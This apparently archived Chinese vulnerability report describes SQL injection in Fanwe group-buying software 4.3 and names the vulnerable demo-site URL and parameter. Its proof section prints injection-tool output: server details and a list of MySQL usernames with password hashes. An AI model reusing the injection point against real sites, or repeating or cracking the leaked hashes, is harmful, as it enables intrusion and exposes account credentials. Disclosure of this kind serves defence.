方维团购4.3版本注射 官方演示大量数据库泄露

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: .......... ### 详细说明: ....... ### 漏洞证明: ``` Target: http://t1.fanwe.net:93/t1/index.php?m=Ajax&a=gettypeattr&type_id=123 Host IP:112.124.32.200 Web Server: IIS Powered-by: WAF/2.0 Powered-by: WAF/2.0 DB Server: MySQL Resp. Time(avg):168 ms Current User: root@127.0.0.1 Current DB: t1 Host Name: AY130625141005Z System User: root@127.0.0.1 Installation dir: C:\Program Files\MySQL\MySQL Server 5.1 Compile OS: Win32 Sql Version: 5.1.63-community-log DB User & Pass: root:*F64A79FC5A78EB0E3F0B5D4FCA58030D524522C4:127.0.0.1 51ecshop:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 education:*CD4EAE64C0B40726E8C22412D4BAC402F8CDBD59:127.0.0.1 fanweadmin:*0347D00A9619E28D8BCD4C1D1642DC362BB24C3C:% fanwegame:*54468371D368D02A33062D435E2FCFAE4A6B3947:% eslicense:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 kiss:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% fx:*B4AE0DB043FD4B762BE654749D5F6BAC258B71DF:127.0.0.1 kaihao138:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:%...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息